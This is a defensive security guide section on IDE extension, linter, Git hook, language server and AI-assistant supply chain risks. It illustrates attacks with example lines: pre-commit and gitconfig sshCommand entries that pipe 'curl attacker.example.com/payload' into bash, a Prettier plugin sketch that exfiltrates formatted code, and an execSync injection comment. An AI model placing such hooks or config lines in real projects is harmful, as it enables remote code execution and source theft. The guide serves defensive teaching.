Skip to content

16.3 IDE and Toolchain Security

In [May 2023][checkpoint-vscode], security researchers from Check Point discovered malicious VS Code extensions that had been downloaded over 45,000 times. These extensions—masquerading as legitimate development tools—stole credentials, installed backdoors, and exfiltrated code.

[checkpoint-vscode]: https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/ The attack exploited a fundamental truth: developers implicitly trust their development environment. When you install an IDE extension, run a linter, or execute a Git hook, you're running code with access to your source files, credentials, and often network connectivity. The same supply chain risks that affect npm packages affect the tools developers use to write code.

This section addresses security risks in IDEs, extensions, and developer toolchains, providing guidance for vetting tools and managing the developer tool ecosystem.

Malicious IDE Extensions and Plugins

IDE extensions are software supply chain dependencies, but few organizations treat them as such.

VS Code Extension Security Model:

VS Code extensions run with the same privileges as VS Code itself—meaning full access to:

  • All files VS Code can access
  • Network connectivity
  • Terminal execution
  • Credential stores
  • Extension APIs (Git, debugging, etc.)

There is no sandbox. An installed extension can read your code, exfiltrate data, and execute arbitrary commands.

Extension Marketplace Risks:

Risk Description
Typosquatting Extensions with names similar to popular ones
Abandoned takeover Popular extensions acquired by malicious actors
Malicious updates Initially benign extensions turned malicious
Trojanized copies Copies of popular extensions with added malware
Fake publishers Publisher names mimicking legitimate developers

Case Study: VS Code Malicious Extensions (2023)

Researchers from [Check Point][checkpoint-vscode] discovered multiple malicious VS Code extensions:

  • "Prettiest java": Typosquatting "Prettier" - stole credentials
  • "Theme Darcula dark": Injected info-stealer malware
  • "python-vscode": Masquerading as official Python extension

These extensions were downloaded over 45,000 times before removal. The attack demonstrated that VS Code Marketplace vetting is insufficient to prevent malicious uploads.

Case Study: Material Theme Extension Removal (2025)

In early 2025, Microsoft removed two of the most popular VS Code extensions—Material Theme and Material Theme Icons—which together had been downloaded nearly 9 million times.1 The removal came after security researchers identified concerning behaviors in the extensions.

Security analysis revealed several red flags:

  • Obfuscated code: The extensions contained heavily obfuscated JavaScript that obscured their true functionality
  • Suspicious network activity: Code patterns suggested potential data collection beyond what a theme extension should require
  • External payload loading: Evidence of code designed to fetch and execute content from external sources
  • Unusual permissions: The extensions requested capabilities unnecessary for their stated purpose of providing visual themes

The incident highlighted a particularly insidious risk: long-trusted extensions can become threats. Unlike the typosquatting attacks that rely on tricking developers into installing a fake extension, Material Theme was a legitimate, popular extension that had earned community trust over years. When its behavior changed—whether through maintainer compromise, acquisition, or intentional modification—millions of users were exposed.

Microsoft's response drew mixed reactions. Some praised the proactive removal; others criticized Microsoft for insufficient communication and for the collateral damage to developers who depended on these extensions. The incident underscored several lessons:

  • Popularity doesn't equal safety: Even extensions with millions of downloads require ongoing scrutiny
  • Theme extensions shouldn't need network access: Any extension requesting capabilities beyond its stated function warrants investigation
  • Ownership changes matter: Extensions that change hands or update after long dormancy should be re-evaluated
  • Obfuscation is a red flag: Legitimate extensions rarely need to hide their code, especially for simple functionality like themes

For organizations, the Material Theme incident reinforced the need for continuous monitoring of installed extensions, not just point-in-time vetting during installation.

JetBrains Plugin Security:

JetBrains IDEs (IntelliJ, PyCharm, WebStorm) have a similar trust model:

  • Plugins execute with full IDE privileges
  • JetBrains Marketplace has review process but not foolproof
  • Third-party plugin repositories have no vetting
JetBrains Plugin Trust Model:
┌─────────────────────────────────────────────┐
│             JetBrains IDE                    │
│  ┌───────────────────────────────────────┐  │
│  │              Plugin                    │  │
│  │  - Full file system access            │  │
│  │  - Network access                     │  │
│  │  - Code execution                     │  │
│  │  - IDE API access                     │  │
│  │  - Credential store access            │  │
│  └───────────────────────────────────────┘  │
└─────────────────────────────────────────────┘

Extension Vetting Criteria:

Before installing any IDE extension:

Factor What to Check Red Flags
Publisher Verified publisher, known organization Unknown publisher, generic name
Downloads Substantial download count Very few downloads
Reviews Genuine reviews, active responses No reviews, fake-looking reviews
Source code Open source, auditable Closed source, no repository
Permissions Minimal, appropriate for function Excessive permissions
Update history Regular, documented updates Recent acquisition, ownership change
Dependencies Minimal, known dependencies Many unknown dependencies

Security teams increasingly treat IDE extensions with the same level of scrutiny as browser extensions, recognizing that a malicious extension has access to all source code and credentials.

Supply Chain Attacks on Developer Tools

Beyond extensions, the tools themselves can be compromised.

XcodeGhost (2015):

Attackers distributed a modified version of Xcode (Apple's development environment) through Chinese file-sharing sites. Developers who used this "XcodeGhost" version unknowingly compiled malware into their iOS applications. Research eventually identified over 2,500 affected apps, with 128 million users having downloaded infected applications. High-profile apps included WeChat, Angry Birds 2, and Didi Kuaidi.

Lessons: - Download development tools only from official sources - Verify cryptographic signatures - Use package managers that verify integrity

Codecov Bash Uploader (2021):

The Codecov bash uploader script (used in CI/CD for code coverage) was compromised. For two months, the modified script exfiltrated environment variables—including CI/CD credentials—to attacker-controlled servers. Affected organizations included HashiCorp, Twilio, Rapid7, and many others.

Lessons: - Pin tool versions with checksums - Don't pipe curl to bash without verification - Monitor for unexpected network activity in CI/CD

Toolchain Verification Practices:

# DON'T: Unverified download and execute
curl -s https://example.com/install.sh | bash

# DO: Download, verify, then execute
curl -o install.sh https://example.com/install.sh
curl -o install.sh.sig https://example.com/install.sh.sig
gpg --verify install.sh.sig install.sh
bash install.sh

# DO: Use package managers with verification
brew install tool  # Homebrew verifies checksums
apt install tool   # APT verifies signatures

Linters and Formatters as Code Execution Vectors

Linters and formatters execute automatically—often on every file save. This makes them attractive attack vectors.

How Linters Execute Code:

Many linters and formatters can execute arbitrary code through configuration:

// .eslintrc.js - JavaScript file, executes on lint
module.exports = {
  // This code runs when ESLint loads
  rules: {
    // Attacker could add: require('child_process').execSync('malicious command')
  }
};
# .pre-commit-config.yaml can specify arbitrary commands
repos:
  - repo: local
    hooks:
      - id: "format"
        name: "format"
        entry: bash -c "curl attacker.example.com/payload | bash"  # Malicious
        language: system

ESLint Plugin Attacks:

ESLint plugins are npm packages that execute during linting:

# Malicious ESLint plugin could:
# - Read all source files being linted
# - Execute arbitrary code
# - Exfiltrate data
# - Modify files

# ESLint plugin has access to:
# - Full file system
# - Network
# - Environment variables

Prettier Plugin Risks:

Prettier plugins similarly execute during formatting:

// A malicious prettier plugin could intercept all code being formatted
module.exports = {
  parsers: {
    javascript: {
      parse: (text) => {
        // Attacker code executes on every format
        exfiltrate(text);  // Send code to attacker
        return actualParse(text);
      }
    }
  }
};

Mitigation Strategies:

  1. Pin linter versions: Don't auto-update linting tools
  2. Review configuration files: Treat .eslintrc.js, prettier.config.js as executable code
  3. Limit plugin use: Only install plugins from trusted sources
  4. Use JSON/YAML configs: Where possible, avoid JavaScript config files that can execute code
  5. Audit in CI/CD: Alert on linter configuration changes

Git Hooks and Security Implications

Git hooks are scripts that Git executes automatically at certain points in the workflow. They're powerful—and dangerous.

Git Hook Types:

Hook When It Runs Risk
pre-commit Before commit created Code execution on commit
post-checkout After checkout/clone Code execution on clone
post-merge After merge Code execution on pull
pre-push Before push Code execution on push

The Clone-Time Execution Problem:

Git hooks in .git/hooks/ are not transferred during clone—that's intentional security. However, developers often use tools like Husky that install hooks automatically:

// package.json with Husky
{
  "scripts": {
    "prepare": "husky install"  // Runs on npm install
  }
}

This means npm install on a cloned repository can install and execute Git hooks.

Attack Scenario:

# Attacker submits PR with:
# 1. Modified package.json to install hooks
# 2. Malicious hook in .husky/pre-commit

# Victim clones and runs npm install
# Malicious pre-commit hook now runs on every commit

Git Config Injection:

Git configurations can also execute code:

# .gitconfig or .git/config
[core]
    # Malicious: executes on operations
    sshCommand = bash -c 'curl attacker.example.com/payload | bash; ssh "$@"'

    # Malicious: executes editor on interactive operations
    editor = bash -c 'malicious_command; vim "$@"'

Safe Git Hook Practices:

  1. Review hook installations: Check what npm install, pip install, etc. install as hooks
  2. Audit .husky/ and similar directories: Treat hook files as executable code
  3. Use hook allowlists: In enterprise, define approved hook managers
  4. Disable hooks for untrusted repos: git clone --template=

Language Server Protocols and Local Code Execution

Language Server Protocol (LSP) enables IDE features like autocomplete, go-to-definition, and error checking. LSP servers execute locally and process your code.

LSP Security Model:

┌──────────────────┐     ┌──────────────────┐
│       IDE        │◄───►│   LSP Server     │
│  (VS Code, etc.) │     │                  │
│                  │     │ - Reads all code │
│                  │     │ - Executes locally│
│                  │     │ - Has file access │
└──────────────────┘     └──────────────────┘

LSP servers: - Read and parse source code files - Execute on the developer's machine - Often run with the same privileges as the IDE - May make network calls (for package resolution, etc.)

LSP Risks:

Risk Example
Malicious LSP server Compromised language server exfiltrates code
Dependency confusion LSP server pulls from compromised package source
Code execution bugs Crafted source file exploits LSP server vulnerability
Data collection LSP server sends telemetry including code snippets

TypeScript Server Vulnerability Example:

In 2023, a vulnerability in the TypeScript language server could be exploited via crafted package.json files. Opening a malicious project in VS Code could execute arbitrary code.

Mitigation:

  • Use official LSP servers from language maintainers
  • Keep LSP servers updated
  • Monitor LSP server network activity
  • Review LSP server permissions and configuration

Enterprise Extension Management

Organizations need strategies to manage developer tool ecosystems at scale.

VS Code Extension Management:

// settings.json - Restrict extensions
{
  "extensions.supportedVersions": {
    "ms-python.python": ">=2024.0.0"
  },
  "extensions.allowed": [
    "ms-python.python",
    "esbenp.prettier-vscode",
    "dbaeumer.vscode-eslint"
  ],
  "extensions.blocked": [
    "suspicious-publisher.*"
  ]
}

Centralized Extension Policies:

Approach Implementation
Allowlist Only approved extensions can be installed
Blocklist Known-bad extensions blocked
Publisher trust Only verified publishers allowed
Private marketplace Host approved extensions internally
Monitoring Alert on unauthorized extension installation

JetBrains Plugin Management:

JetBrains IDEs support custom plugin repositories:

<!-- idea.properties -->
idea.plugins.host=https://plugins.internal.example.com
idea.plugins.compatible.build=true

Extension Governance Process:

# Extension Approval Process

### Request
1. Developer requests extension via ticket
2. Include: Extension name, publisher, purpose, URL

### Review
1. Security reviews extension source (if available)
2. Check publisher reputation and history
3. Analyze permissions requested
4. Test in isolated environment
5. Verify no malicious indicators

### Decision
- Approved: Add to allowlist
- Denied: Document reason, suggest alternatives
- Conditional: Approved with restrictions

### Monitoring
- Quarterly review of approved extensions
- Alert on extension ownership changes
- Reassess on security incidents

AI Coding Assistant Security Considerations

AI coding assistants (GitHub Copilot, Amazon CodeWhisperer, Codeium) introduce new supply chain risks.

Data Leakage Risks:

AI assistants send code to external servers for processing:

Risk Description
Code exfiltration Proprietary code sent to AI provider
Secret exposure API keys, credentials in code sent externally
Context bleeding Code from one project influences suggestions in another
Training data Your code may train future models (policy dependent)

Suggestion Risks:

AI assistants suggest code that may include:

  • Vulnerable patterns: Known insecure code from training data
  • Outdated practices: Deprecated APIs, old security patterns
  • License issues: Code snippets from copyrighted sources
  • Hallucinated packages: Non-existent packages that could be typosquatted

Package Hallucination:

Research has shown AI assistants suggest packages that don't exist—a vector for "slopsquatting":

# AI suggests:
import flask_security_utils  # Package doesn't exist!

# Attacker could register this package name
# Anyone using the AI suggestion would install malware

AI Assistant Governance:

## AI Coding Assistant Policy

### Approved Tools
- GitHub Copilot (Business tier with data protection)
- [List other approved tools]

### Prohibited Uses
- Code containing secrets or credentials
- Highly sensitive/classified projects
- Code subject to specific compliance requirements

### Required Practices
- Review all AI suggestions before accepting
- Never accept package imports without verification
- Report hallucinated package names to security team
- Disable AI assistance for sensitive files

### Configuration
- Enable organization-managed settings
- Disable code snippet sharing for training
- Configure IDE to exclude sensitive directories

Secure AI Assistant Configuration:

// VS Code settings for Copilot
{
  "github.copilot.enable": {
    "*": true,
    "plaintext": false,  // Disable for plaintext (may contain secrets)
    "markdown": false,
    "yaml": false        // Disable for config files
  },
  "github.copilot.advanced": {
    "excludeFiles": [
      "**/.env*",
      "**/secrets/**",
      "**/credentials/**"
    ]
  }
}

Development teams report instances of AI coding assistants suggesting non-existent packages. Organizations now verify all AI-suggested package imports before use to prevent slopsquatting attacks.

Recommendations

For Developers:

  1. We recommend vetting extensions like dependencies. Before installing any IDE extension, check the publisher, download count, and source code availability. Unknown extensions are untrusted code.

  2. We recommend verifying tool downloads. Download development tools only from official sources. Verify signatures where available.

  3. You should review AI suggestions critically. Don't accept package imports without verifying the package exists and is trustworthy. AI assistants hallucinate.

For Security Practitioners:

  1. We recommend implementing extension governance. Create allowlists for approved IDE extensions. Monitor for unauthorized installations.

  2. We recommend treating configs as code. Linter configs, Git hooks, and tool configurations can execute arbitrary code. Review them in code review.

  3. We recommend assessing AI assistant risks. Understand what code goes to AI providers. Establish policies for sensitive projects.

For IT Administrators:

  1. We recommend deploying private extension marketplaces. For high-security environments, host approved extensions internally.

  2. We recommend configuring telemetry appropriately. Understand what data IDE and tools collect. Configure per organizational policy.

  3. We recommend monitoring developer tool behavior. Alert on unexpected network connections from IDE processes, especially to unusual destinations.

The developer toolchain is a supply chain within the supply chain. Every extension, plugin, linter, and AI assistant is code running with access to your most sensitive asset—the code you're writing. Organizations that recognize this and apply supply chain security principles to their development environment close a significant gap that attackers increasingly target.


  1. Visual Studio Marketplace download statistics and Microsoft Marketplace data, January 2025; multiple security researchers documented the download counts prior to removal.